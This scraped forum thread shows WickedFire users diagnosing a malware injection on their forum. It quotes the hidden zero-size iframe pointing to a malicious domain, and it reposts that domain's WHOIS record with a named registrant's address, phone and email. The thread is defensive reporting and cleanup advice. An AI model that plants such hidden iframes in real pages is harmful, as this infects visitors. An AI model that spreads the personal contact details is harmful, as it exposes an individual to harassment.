Malware on WickedFire?
- Thread starter zimok
- Start date
- Status
I'm getting the same on Safari 4
http://www.wickedfire.com/suggestion-box/61904-forum-spam-new-post.html
http://www.wickedfire.com/suggestion-box/61904-forum-spam-new-post.html
Norton just blocked:
HTTP malicious javascript encoder
attacking computer: naemnitibo.in (200.63.45.34)
attacker url: naemnitibo.in/cn.php?hyc
tried to attack me on port 57707 :glowingeyes_sml:
HTTP malicious javascript encoder
attacking computer: naemnitibo.in (200.63.45.34)
attacker url: naemnitibo.in/cn.php?hyc
tried to attack me on port 57707 :glowingeyes_sml:
If anyone has a mods phone # or Jon's phone, call him and tell them to remove the rogue iframe. Every hour is money in the hands of the crooks.
Found it...
Here's the domain info for this stupid fuck. Obviously it's anonymous but I'm hoping Shady will show up soon and dig a little deeper than I can.
Domain Name:NAEMNITIBO.IN
Created On:18-May-2009 15:34:44 UTC
Last Updated On:18-May-2009 15:37:31 UTC
Expiration Date:18-May-2010 15:34:44 UTC
Sponsoring Registrar:Web Commerce Communications Limited dba WebNic.cc (R105-AFIN)
Status:TRANSFER PROHIBITED
Registrant ID:WN13571799T
Registrant Name:Alexander Kalinin
Registrant Organization
rivate person
Registrant Street1:ulitsa Dolskaya d.10 kv.33
Registrant Street2:
Registrant Street3:
Registrant City:Moskva
Registrant State/Province:Moskva
Registrant Postal Code:115569
Registrant Country:RU
Registrant Phone:+7.49573431510
Registrant Phone Ext.:
Registrant FAX:+0.0
Registrant FAX Ext.:
Registrant Email:statue@mediahouse.at
Admin ID:WN13571800T
Admin Name:Alexander Kalinin
Admin Organizationrivate person
Admin Street1:ulitsa Dolskaya d.10 kv.33
Admin Street2:
Admin Street3:
Admin City:Moskva
Admin State/Province:Moskva
Admin Postal Code:115569
Admin Country:RU
Admin Phone:+7.49573431510
Admin Phone Ext.:
Admin FAX:+0.0
Admin FAX Ext.:
Admin Email:statue@mediahouse.at
Tech ID:WN13571801T
Tech Name:Alexander Kalinin
Tech Organizationrivate person
Tech Street1:ulitsa Dolskaya d.10 kv.33
Tech Street2:
Tech Street3:
Tech City:Moskva
Tech State/Province:Moskva
Tech Postal Code:115569
Tech Country:RU
Tech Phone:+7.49573431510
Tech Phone Ext.:
Tech FAX:+0.0
Tech FAX Ext.:
Tech Email:statue@mediahouse.at
Name Server:NS1.NAEMNITIBO.IN
Name Server:NS2.NAEMNITIBO.IN
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px inset;
width: 640px;
height: 34px;
text-align: left;
overflow: auto"><iframe src="http://naemnitibo.in/cn.php?hyc" width="0" height="0"></iframe></pre>Domain Name:NAEMNITIBO.IN
Created On:18-May-2009 15:34:44 UTC
Last Updated On:18-May-2009 15:37:31 UTC
Expiration Date:18-May-2010 15:34:44 UTC
Sponsoring Registrar:Web Commerce Communications Limited dba WebNic.cc (R105-AFIN)
Status:TRANSFER PROHIBITED
Registrant ID:WN13571799T
Registrant Name:Alexander Kalinin
Registrant Organization
rivate person Registrant Street1:ulitsa Dolskaya d.10 kv.33
Registrant Street2:
Registrant Street3:
Registrant City:Moskva
Registrant State/Province:Moskva
Registrant Postal Code:115569
Registrant Country:RU
Registrant Phone:+7.49573431510
Registrant Phone Ext.:
Registrant FAX:+0.0
Registrant FAX Ext.:
Registrant Email:statue@mediahouse.at
Admin ID:WN13571800T
Admin Name:Alexander Kalinin
Admin Organization
rivate person Admin Street1:ulitsa Dolskaya d.10 kv.33
Admin Street2:
Admin Street3:
Admin City:Moskva
Admin State/Province:Moskva
Admin Postal Code:115569
Admin Country:RU
Admin Phone:+7.49573431510
Admin Phone Ext.:
Admin FAX:+0.0
Admin FAX Ext.:
Admin Email:statue@mediahouse.at
Tech ID:WN13571801T
Tech Name:Alexander Kalinin
Tech Organization
rivate person Tech Street1:ulitsa Dolskaya d.10 kv.33
Tech Street2:
Tech Street3:
Tech City:Moskva
Tech State/Province:Moskva
Tech Postal Code:115569
Tech Country:RU
Tech Phone:+7.49573431510
Tech Phone Ext.:
Tech FAX:+0.0
Tech FAX Ext.:
Tech Email:statue@mediahouse.at
Name Server:NS1.NAEMNITIBO.IN
Name Server:NS2.NAEMNITIBO.IN
Is anyone seeing anything in Firefox? No error here, wondering if it's just because the site is blocked by default.
texic, do you have an AV installed? If not, you could easily be infected with whatever this guys pushing around. Download FREE antivirus software - avast! Home Edition
I'm running Kaspersky and all my definitions are up to date. Seems that because Firefox blocks the site by default, nothing is ever run.
yea i'm getting it on every page of wf on safari 4, basically the embeded url got it flagged as a malware site by association.
my girlfriend's sites got infected recently with something similar (was javascript, not iframes though)
i researched it and basically there is spyware out there that sits idol on people's home computers monitoring FTP ports and sending username/passwords whenever someone logs into an FTP... basic ftp connections aren't encrypted. it's better to use sftp. i cleaned her computer of everything, changed her passwords, and had her switch to sftp before I could get the code to stop popping up every night.
i don't know if that's the problem here, but just a suggestion. i searched for 2-3 days before i figured out that her problems weren't holes in her php scripts or server side stuff....
i researched it and basically there is spyware out there that sits idol on people's home computers monitoring FTP ports and sending username/passwords whenever someone logs into an FTP... basic ftp connections aren't encrypted. it's better to use sftp. i cleaned her computer of everything, changed her passwords, and had her switch to sftp before I could get the code to stop popping up every night.
i don't know if that's the problem here, but just a suggestion. i searched for 2-3 days before i figured out that her problems weren't holes in her php scripts or server side stuff....
Here's Google's diagnostic page about that website: Google Safe Browsing diagnostic page for naemnitibo.in
That's true. If you run Firefox it blocks accessing that website until you tell it to do otherwise.
- Status